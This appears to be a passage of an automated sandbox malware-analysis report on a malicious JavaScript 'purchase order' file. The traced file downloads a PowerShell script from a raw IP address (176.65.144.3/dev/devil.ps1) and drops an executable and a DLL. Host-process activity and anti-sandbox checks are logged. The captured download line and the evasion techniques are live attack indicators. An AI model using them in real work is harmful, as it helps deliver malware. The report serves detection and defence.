r:%22FolderExists%22");IFileSystem3._00000000();ITextStream.WriteLine(" entry:507 o: f:FolderExists a0:%22C%3A%5CTemp%22");IFileSystem3.FolderExists("C:\Temp");IFileSystem3._00000000();ITextStream.WriteLine(" exit:507 o: f:FolderExists r:false");ITextStream.WriteLine(" entry:522 f:l a0:507 a1:%220C0E%22");ITextStream.WriteLine(" exit:522 f:l r:%22CreateFolder%22");IFileSystem3._00000000();ITextStream.WriteLine(" entry:518 o: f:CreateFolder a0:%22C%3A%5CTemp%22");IFileSystem3.CreateFolder("C:\Temp");IFileSystem3._00000000();IFolder.Path();ITextStream.WriteLine(" exit:518 o: f:CreateFolder r:C%3A%5CTemp");ITextStream.WriteLine(" entry:1256 f:DownloadScript a0:%22http%3A%2F%2F176.65.144.3%2Fdev%2Fdevil.ps1%22 a1:%22C%3A%5CTemp%5CWTRTRWFSHS.ps1%22");ITextStream.WriteLine(" exec:997 f:DownloadScript");ITextStream.WriteLine(" entry:1015 f:m a0:522 a1:%22Cto7%22");ITextStream.WriteLine(" exit:1015 f:m r:%22GET%22");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:1009 o: f:Open a0:%22GET%22 a1:%22http%3A%2F%2F176.65.144.3%2Fdev%2Fdevil.ps1%22 a2:false");IServerXMLHTTPRequest2.open("GET", "http://176.65.144.3/dev/devil.ps1", "false");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:1009 o: f:Open r:undefined");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:1023 o: f:Send");IServerXMLHTTPRequest2.send();ITextStream.WriteLine(" exit:490 f:l r:%22Scripting.FileSystemObject%22");IHost.Name();ITextStream.WriteLine(" entry:484 o:Windows%20Script%20Host f:CreateObject a0:%22Scripting.FileSystemObject%22");IHost.CreateObject("Scripting.FileSystemObject");IHost.Name();IFileSystem3._00000000();ITextStream.WriteLine(" exit:484 o:Windows%20Script%20Host f:CreateObject r:");IHost.Name();ITextStream.WriteLine(" entry:496 o:Windows%20Script%20Host f:CreateObject a0:%22MSXML2.XMLHTTP%22");IHost.CreateObject("MSXML2.XMLHTTP");IHost.Name();IServerXMLHTTPReque
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEFAK
                    Source: PO_111101111001.jsInitial file: High amount of function use 7
                    Source: QWQWSAADAF.exe.9.drStatic PE information: 0xAF5B34A9 [Sat Mar 24 19:27:37 2063 UTC]
                    Source: QWQWSAADAF.exe.9.drStatic PE information: section name: .-L3/F
                    Source: QWQWSAADAF.exe.9.drStatic PE information: section name:
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFC3C3000BD pushad ; iretd 9_2_00007FFC3C3000C1
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeCode function: 11_2_0264229E push edi; iretd 11_2_026422A5
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeCode function: 11_2_00CF04D5 push edx; retf 0000h11_2_00CF04FA
                    Source: QWQWSAADAF.exe.9.drStatic PE information: section name: .-L3/F entropy: 7.974271644493695
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeFile created: C:\Users\user\AppData\Local\Temp\RUNPEE.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeJump to dropped file
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: aspnet_compiler.exe, 0000000C.00000002.2454758646.0000000003276000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLLT-
                    Source: QWQWSAADAF.exe, 0000000B.00000002.1367785643.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, QWQWSAADAF.exe, 0000000B.00000002.1367785643.0000000003F79000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000002.2446694240.0000000000402000.00000040.00000400.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000002.2454758646.00000000031C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeMemory allocated: CF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeMemory allocated: 2770000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeMemory allocated: 2590000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeMemory allocated: 4D20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeMemory allocated: 5D20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeMemory allocated: 5E50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeMemory allocated: 6E50000 memory reserve | memory write watchJump to behavior
